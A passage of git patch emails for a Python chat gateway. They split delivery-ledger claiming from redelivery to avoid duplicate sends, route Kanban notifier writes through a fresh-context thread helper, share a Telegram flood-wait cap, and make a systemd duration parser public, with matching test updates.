a flood-controllable send. If that notification outlived the restore-gate timeout, the gate opened with zero rows claimed and the resume scheduler replayed turns whose answers were already in the ledger, while the background task later redelivered them too (duplicate delivery + re-paid turn). Split _redeliver_pending_obligations into _claim_pending_obligations (pure DB: sweep + resume clear, awaited inline before the send task exists) and _redeliver_claimed_obligations (network half, stays inside the bounded task). The original name remains as a composition wrapper. Mutation-checked: both updated gate tests fail on pre-split run.py. --- gateway/run.py | 111 +++++++++++++------ tests/gateway/test_restart_resume_pending.py | 15 ++- 2 files changed, 91 insertions(+), 35 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index 50b2925d71..5070e47b56 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -11920,12 +11920,27 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew startup-restore gate. Logs a late failure that would otherwise be swallowed once the task is discarded from ``_background_tasks``. Cancellation is expected (shutdown) and is not an error.""" + GatewayRunner._log_late_background_failure( + task, + "background startup auto-resume task failed after gate release", + level=logging.DEBUG, + ) + + @staticmethod + def _log_late_background_failure( + task: "asyncio.Task", message: str, *, level: int = logging.WARNING + ) -> None: + """Shared done-callback body for boot-path tasks that outlive the + startup-restore gate: surface a late failure that would otherwise be + swallowed once the task is discarded from ``_background_tasks``. + Cancellation is expected (shutdown) and is not an error.""" if task.cancelled(): return exc = task.exception() if exc is not None: - logger.debug( - "background startup auto-resume task failed after gate release", + logger.log( + level, + message, exc_info=(type(exc), exc, exc.__traceback__), ) @@ -11945,7 +11960,18 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew This uses the same bounded ``asyncio.wait`` the resume gate already uses: on timeout we return and let the sends finish in the background. Tasks are not cancelled. + + The ledger claim + ``resume_pending`` clear happen INLINE here, + before the send task exists: they are pure DB work (no network, + bounded by claimed-row count), and deferring them into the send + task left a window where a hung restart notification ahead of the + redelivery step let the gate expire with zero rows claimed — the + resume scheduler then replayed turns whose answers were already in + the ledger, and the background task later redelivered them too + (duplicate delivery + re-paid turn). """ + claimed = await self._claim_pending_obligations() + async def _boot_sends() -> None: await self._send_restart_notification() if planned_restart_notification_pending: @@ -11955,7 +11981,7 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew ) finally: _clear_planned_restart_notification() - await self._redeliver_pending_obligations() + await self._redeliver_claimed_obligations(claimed) boot_task = asyncio.create_task(_boot_sends()) timeout = _startup_restore_drain_timeout_secs() @@ -11982,43 +12008,35 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew @staticmethod def _log_background_boot_send_result(task: "asyncio.Task") -> None: """Done-callback for boot-path sends that outlived the restore gate.""" - if task.cancelled(): - return - exc = task.exception() - if exc is not None: - logger.warning( - "background boot-path send failed after gate release: %s", - exc, - exc_info=(type(exc), exc, exc.__traceback__), - ) + GatewayRunner._log_late_background_failure( + task, "background boot-path send failed after gate release: see traceback" + ) - async def _redeliver_pending_obligations(self) -> int: - """Redeliver final responses recorded in the delivery ledger by a - previous (now dead) gateway process. + async def _claim_pending_obligations(self) -> list: + """Claim recoverable delivery-ledger rows and clear their + ``resume_pending`` flags. Pure DB work — no network sends. - Runs at startup BEFORE ``_schedule_resume_pending_sessions``. A + Runs INLINE at startup BEFORE ``_schedule_resume_pending_sessions`` + and before the (bounded, abandonable) boot-send task exists. A session with a recoverable obligation already produced its answer — - the turn completed and only delivery is owed — so this method sends - the stored text and clears ``resume_pending`` for that session, - preventing the resume path from re-running (and re-paying for) a - turn whose output we hold. + the turn completed and only delivery is owed — so clearing + ``resume_pending`` here prevents the resume path from re-running + (and re-paying for) a turn whose output we hold, regardless of how + long the sends ahead of redelivery take (#91969). Crash-ambiguity contract (see gateway/delivery_ledger.py): rows that were mid-send or previously rejected carry a visible recovered-reply marker so a possible duplicate is labeled, never - silent. Returns the number of redeliveries attempted. + silent. Returns the claimed rows for redelivery. """ try: from gateway.delivery_ledger import ( - RECOVERED_MARKER, ledger_enabled, - mark_delivered, - mark_failed, sweep_recoverable, ) if not await asyncio.to_thread(ledger_enabled): - return 0 + return [] # Only claim rows we can actually send this boot: self.adapters # holds a platform only after its connect() succeeded, and each # claim spends one of the row's three redelivery attempts. @@ -12030,17 +12048,14 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew ) except Exception: logger.debug("delivery ledger sweep failed", exc_info=True) - return 0 + return [] if not claimed: - return 0 + return [] # Clear resume_pending for EVERY claimed row up front, before any # send. Claiming already spent one of the row's redelivery attempts — # the answer is in the ledger, so the resume path must never re-run - # these turns. Doing this per-row as the loop reaches each send left - # a window: when a slow/flood-limited send held the loop past the - # inbound-gate timeout, _schedule_resume_pending_sessions could - # replay turns for rows the loop had not reached yet (#91969). + # these turns (#91969). for row in claimed: session_key = row.get("session_key") or "" if not session_key: @@ -12052,6 +12067,27 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew "clear_resume_pending failed for %s", session_key, exc_info=True, ) + return claimed + + async def _redeliver_claimed_obligations(self, claimed: list) -> int: + """Redeliver final responses for rows already claimed (and + resume-cleared) by :meth:`_claim_pending_obligations`. + + Network half of the split — runs inside the bounded boot-send task, + so a flood-limited send can be abandoned by the restore gate without + reopening the turn-replay window. Returns redeliveries attempted. + """ + if not claimed: + return 0 + try: + from gateway.delivery_ledger import ( + RECOVERED_MARKER, + mark_delivered, + mark_failed, + ) + except Exception: + logger.debug("delivery ledger import failed", exc_info=True) + return 0 redelivered = 0 for row in claimed: @@ -12107,6 +12143,19 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew logger.debug("delivery ledger update failed", exc_info=True) return redelivered + async def _redeliver_pending_obligations(self) -> int: + """Claim + redeliver in one call — composition of + :meth:`_claim_pending_obligations` and + :meth:`_redeliver_claimed_obligations`. + + Kept as the stable public shape (tests and any external callers + drive this name); the startup path calls the two halves separately + so the DB half can run inline before the abandonable send task. + """ + return await self._redeliver_claimed_obligations( + await self._claim_pending_obligations() + ) + def _schedule_resume_pending_sessions(self, platform=None) -> int: """Auto-continue fresh restart-interrupted sessions after startup. diff --git a/tests/gateway/test_restart_resume_pending.py b/tests/gateway/test_restart_resume_pending.py index 5c26e37c62..2e99c2605b 100644 --- a/tests/gateway/test_restart_resume_pending.py +++ b/tests/gateway/test_restart_resume_pending.py @@ -1102,7 +1102,8 @@ async def test_startup_restore_gate_releases_when_boot_path_send_hangs( return None runner._send_restart_notification = never_returns - runner._redeliver_pending_obligations = AsyncMock(return_value=0) + runner._claim_pending_obligations = AsyncMock(return_value=[]) + runner._redeliver_claimed_obligations = AsyncMock(return_value=0) seen: list[str] = [] @@ -1133,7 +1134,11 @@ async def test_startup_restore_gate_releases_when_boot_path_send_hangs( ) assert runner._startup_restore_queue == [] assert runner._startup_restore_in_progress is False - runner._redeliver_pending_obligations.assert_not_awaited() + # The DB half (claim + resume clear) runs inline BEFORE the abandonable + # send task, so it must have completed even though the boot send hung; + # the network half never ran because the hung notification precedes it. + runner._claim_pending_obligations.assert_awaited_once() + runner._redeliver_claimed_obligations.assert_not_awaited() hung.set() leftover = [t for t in list(runner._background_tasks) if not t.done()] @@ -1149,13 +1154,15 @@ async def test_startup_boot_sends_still_run_when_they_finish_quickly(monkeypatch runner, _adapter = make_restart_runner() runner._background_tasks = set() runner._send_restart_notification = AsyncMock(return_value=None) - runner._redeliver_pending_obligations = AsyncMock(return_value=0) + runner._claim_pending_obligations = AsyncMock(return_value=[]) + runner._redeliver_claimed_obligations = AsyncMock(return_value=0) await runner._await_startup_boot_sends( planned_restart_notification_pending=False, ) runner._send_restart_notification.assert_awaited_once() - runner._redeliver_pending_obligations.assert_awaited_once() + runner._claim_pending_obligations.assert_awaited_once() + runner._redeliver_claimed_obligations.assert_awaited_once() From bdd281d0784232382bbb9314bbc6f0ce4bfae2d1 Mon Sep 17 00:00:00 2001 From: Kshitij Kapoor Date: Sat, 22 Aug 2026 16:26:51 +0530 Subject: [PATCH 159/161] refactor(gateway): route kanban notifier writer offloads through _to_thread_process_service The notifier watcher offloads the same class of guarded Kanban writers (_kanban_advance/_kanban_rewind/_kanban_unsub) as the dispatcher ticks that #92172 wrapped. Apply the same offload-boundary scrub to all 10 writer sites for uniform defense-in-depth (read-only _collect stays on bare to_thread), and reword the helper docstrings to state the defense-in-depth relationship to spawn isolation accurately. --- gateway/kanban_watchers.py | 32 ++++++++++++++++++-------------- 1 file changed, 18 insertions(+), 14 deletions(-) diff --git a/gateway/kanban_watchers.py b/gateway/kanban_watchers.py index 45504eb866..abe13f8139 100644 --- a/gateway/kanban_watchers.py +++ b/gateway/kanban_watchers.py @@ -79,15 +79,19 @@ def _run_in_fresh_context(func: Callable[..., Any], /, *args: Any) -> Any: ``asyncio.to_thread`` copies the calling task's context onto the worker thread. Supervised Kanban ticks are process-owned writers; if that copy - still carries a ``delegate_task`` child marker (spawn-time snapshot or a - later polluted task), ``write_txn`` false-trips. An empty Context keeps - the DB guard intact for real children without exempting dispatcher writes. + still carries a ``delegate_task`` child marker, ``write_txn`` + false-trips. Since watchers spawn from a fresh ``Context`` + (``_spawn_supervised``), this offload-boundary scrub is defense in + depth: it covers non-supervised spawn paths and any task context frozen + before spawn isolation shipped. An empty Context keeps the DB guard + intact for real children without exempting dispatcher writes. """ return Context().run(func, *args) async def _to_thread_process_service(func: Callable[..., Any], /, *args: Any) -> Any: - """Offload blocking dispatcher work without inheriting request-local ContextVars.""" + """Offload blocking process-service work (dispatcher + notifier writers) + without inheriting request-local ContextVars.""" return await asyncio.to_thread(_run_in_fresh_context, func, *args) @@ -496,7 +500,7 @@ class GatewayKanbanWatchersMixin: except ValueError: # Unknown platform string; skip and advance cursor so # we don't replay forever. - await asyncio.to_thread( + await _to_thread_process_service( self._kanban_advance, sub, d["cursor"], board_slug, ) continue @@ -516,7 +520,7 @@ class GatewayKanbanWatchersMixin: "kanban notifier: adapter %s disconnected before delivery for %s; rewinding claim", platform_str, sub["task_id"], ) - await asyncio.to_thread( + await _to_thread_process_service( self._kanban_rewind, sub, d["cursor"], @@ -745,10 +749,10 @@ class GatewayKanbanWatchersMixin: "%s on %s after %d consecutive send failures", sub["task_id"], platform_str, fails, ) - await asyncio.to_thread(self._kanban_unsub, sub, board_slug) + await _to_thread_process_service(self._kanban_unsub, sub, board_slug) sub_fail_counts.pop(sub_key, None) else: - await asyncio.to_thread( + await _to_thread_process_service( self._kanban_rewind, sub, d["cursor"], @@ -868,13 +872,13 @@ class GatewayKanbanWatchersMixin: "%s on %s after %d consecutive wake failures", sub["task_id"], platform_str, fails, ) - await asyncio.to_thread(self._kanban_unsub, sub, board_slug) + await _to_thread_process_service(self._kanban_unsub, sub, board_slug) sub_fail_counts.pop(sub_key, None) else: # Rewind the pre-send claim so the next # tick retries the self-post — the event # is NOT lost. - await asyncio.to_thread( + await _to_thread_process_service( self._kanban_rewind, sub, d["cursor"], @@ -968,13 +972,13 @@ class GatewayKanbanWatchersMixin: "%s on %s after %d consecutive wake failures", sub["task_id"], platform_str, fails, ) - await asyncio.to_thread(self._kanban_unsub, sub, board_slug) + await _to_thread_process_service(self._kanban_unsub, sub, board_slug) sub_fail_counts.pop(sub_key, None) else: # Rewind the pre-send claim so the next # tick retries the wake — the event is # NOT lost. - await asyncio.to_thread( + await _to_thread_process_service( self._kanban_rewind, sub, d["cursor"], @@ -988,7 +992,7 @@ class GatewayKanbanWatchersMixin: # push subs): advance cursor. The cursor is the dedup # mechanism — it prevents re-delivery of the same # event on subsequent ticks. - await asyncio.to_thread( + await _to_thread_process_service( self._kanban_advance, sub, d["cursor"], board_slug, ) if not _is_push_adapter: @@ -1018,7 +1022,7 @@ class GatewayKanbanWatchersMixin: sub["task_id"], _wk_err, exc_info=True, ) if task_terminal: - await asyncio.to_thread( + await _to_thread_process_service( self._kanban_unsub, sub, board_slug, ) except Exception as exc: From 1db0a7d825ae6e8ca028934406d79b5737f2385d Mon Sep 17 00:00:00 2001 From: Kshitij Kapoor Date: Sat, 22 Aug 2026 16:26:51 +0530 Subject: [PATCH 160/161] refactor(telegram): share the flood-wait cap between send and edit paths Extract _FLOOD_INLINE_WAIT_CAP_SECS + _flood_cap_result so the 5s cap and the flood_control:{wait} error contract cannot drift between the edit path and the send path #92173 added. --- plugins/platforms/telegram/adapter.py | 38 ++++++++++++++++++--------- 1 file changed, 25 insertions(+), 13 deletions(-) diff --git a/plugins/platforms/telegram/adapter.py b/plugins/platforms/telegram/adapter.py index a5433f5ed8..9624fe5f69 100644 --- a/plugins/platforms/telegram/adapter.py +++ b/plugins/platforms/telegram/adapter.py @@ -311,6 +311,25 @@ from plugins.platforms.telegram.telegram_network import ( from utils import atomic_replace, env_float, env_int _TELEGRAM_IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".webp", ".gif"} + +# Max seconds a send/edit coroutine may sleep inline on a Telegram +# flood-control RetryAfter. Longer server penalties fail closed with a +# ``flood_control:{wait}`` SendResult so the caller's retry machinery +# (delivery ledger, streaming fallback) owns the wait instead of the +# coroutine pinning its worker — a 97-minute penalty on the boot path +# froze inbound on every platform (#91969). +_FLOOD_INLINE_WAIT_CAP_SECS = 5.0 + + +def _flood_cap_result(wait: float) -> "SendResult": + """The shared fail-closed SendResult for an over-cap flood wait.""" + return SendResult( + success=False, + error=f"flood_control:{wait}", + retry_after=float(wait), + ) + + _TELEGRAM_IMAGE_MIME_TO_EXT = { "image/png": ".png", "image/jpeg": ".jpg", @@ -5449,20 +5468,17 @@ class TelegramAdapter(BasePlatformAdapter): # pinned send() for 97 minutes in production and # froze inbound on every platform when it ran on # the gateway boot path (#91969). - if wait > 5.0: + if wait > _FLOOD_INLINE_WAIT_CAP_SECS: logger.warning( "[%s] Telegram flood control on send " - "(retry_after=%.1fs > 5s); failing closed " + "(retry_after=%.1fs > %.0fs); failing closed " "instead of sleeping: %s", self.name, wait, + _FLOOD_INLINE_WAIT_CAP_SECS, safe_send_error, ) - return SendResult( - success=False, - error=f"flood_control:{wait}", - retry_after=float(wait), - ) + return _flood_cap_result(wait) if _send_attempt < 2: logger.warning( "[%s] Telegram flood control on send (attempt %d/3), retrying in %.1fs: %s", @@ -5714,12 +5730,8 @@ class TelegramAdapter(BasePlatformAdapter): "[%s] Telegram flood control, waiting %.1fs", self.name, wait, ) - if wait > 5.0: - return SendResult( - success=False, - error=f"flood_control:{wait}", - retry_after=float(wait), - ) + if wait > _FLOOD_INLINE_WAIT_CAP_SECS: + return _flood_cap_result(wait) await asyncio.sleep(wait) try: await self._bot.edit_message_text( From a18f90847b46786880fb9b4975c94c0393fc6a58 Mon Sep 17 00:00:00 2001 From: Kshitij Kapoor Date: Sat, 22 Aug 2026 16:26:51 +0530 Subject: [PATCH 161/161] refactor(gateway): promote parse_systemd_duration_to_us to public hermes_cli/gateway.py's restart-wait sizing (from #92175) was the only cross-module import of an underscore-private shutdown_forensics helper. Promote it (private alias retained for existing patchers). --- gateway/shutdown_forensics.py | 10 ++++++++-- hermes_cli/gateway.py | 4 ++-- 2 files changed, 10 insertions(+), 4 deletions(-) diff --git a/gateway/shutdown_forensics.py b/gateway/shutdown_forensics.py index 34836cc6fb..f93cdc4e58 100644 --- a/gateway/shutdown_forensics.py +++ b/gateway/shutdown_forensics.py @@ -382,7 +382,7 @@ def check_systemd_timing_alignment(drain_timeout: float) -> Optional[Dict[str, A if value.isdigit(): timeout_us = int(value) else: - timeout_us = _parse_systemd_duration_to_us(value) + timeout_us = parse_systemd_duration_to_us(value) if timeout_us is not None: break if timeout_us is not None: @@ -406,11 +406,13 @@ def check_systemd_timing_alignment(drain_timeout: float) -> Optional[Dict[str, A } -def _parse_systemd_duration_to_us(raw: str) -> Optional[int]: +def parse_systemd_duration_to_us(raw: str) -> Optional[int]: """Parse 'TimeoutStopUSec=1min 30s' / '90s' style values to microseconds. systemd accepts a wide grammar; we cover the common cases (s, ms, min, h) and return None on anything unexpected. Never raises. + + Public: also consumed by hermes_cli.gateway's restart-wait sizing. """ if not raw: return None @@ -460,3 +462,7 @@ def _parse_systemd_duration_to_us(raw: str) -> Optional[int]: return None digits = "" return total_us if total_us > 0 else None + + +# Backward-compat private alias (pre-promotion name). +_parse_systemd_duration_to_us = parse_systemd_duration_to_us diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py index 0ae4a523fb..1cd3d11aae 100644 --- a/hermes_cli/gateway.py +++ b/hermes_cli/gateway.py @@ -1330,7 +1330,7 @@ def _wait_for_systemd_service_restart( def _systemd_restart_wait_timeout(system: bool = False) -> float: """Cover systemd's relaunch delays before applying the runtime wait floor.""" - from gateway.shutdown_forensics import _parse_systemd_duration_to_us + from gateway.shutdown_forensics import parse_systemd_duration_to_us props = _read_systemd_unit_properties( system=system, @@ -1340,7 +1340,7 @@ def _systemd_restart_wait_timeout(system: bool = False) -> float: for name in ("RestartUSec", "TimeoutStartUSec"): raw = props.get(name, "") duration_us = ( - int(raw) if raw.isdigit() else _parse_systemd_duration_to_us(raw) + int(raw) if raw.isdigit() else parse_systemd_duration_to_us(raw) ) if duration_us is not None: supervisor_budget += duration_us / 1_000_000